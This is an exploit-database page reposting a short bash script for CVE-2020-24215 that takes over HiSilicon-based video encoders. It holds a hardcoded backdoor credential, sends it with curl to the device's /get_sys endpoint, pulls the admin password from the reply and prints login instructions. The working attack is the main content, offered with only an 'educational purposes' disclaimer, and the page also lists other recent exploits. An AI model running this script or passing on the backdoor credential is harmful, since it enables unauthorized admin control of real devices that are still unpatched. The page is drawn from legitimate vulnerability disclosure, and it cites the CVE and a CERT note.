Hisilicon video encoders full admin access via backdoor password Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-10-19 | Type : webapps | Platform : hardware
This exploit / vulnerability Hisilicon video encoders full admin access via backdoor password is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

#!/usr/bin/env bash

# Exploit Title: HiSilicon video encoders - full admin access via backdoor password
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24215
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979


if [ "$#" -ne 1 ]
then
echo "Usage: $0 <server>[:<port>]"
exit 1
fi

printf "retrieving the password... "
password=$(curl -s --user admin:neworange88888888 http://$1/get_sys | \
grep -oP '(?<=<html_password>).*?(?=</html_password>)')
ret=$?

if [ "$ret" -eq 0 ]
then
echo "the password is '$password'"
echo "navigate to http://$1 and log into the admin interface with user 'admin' and password '$password'"
else
echo "ERROR: curl returned $ret"
fi

Hisilicon video encoders full admin access via backdoor password


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Hisilicon video encoders full admin access via backdoor password Vulnerability / Exploit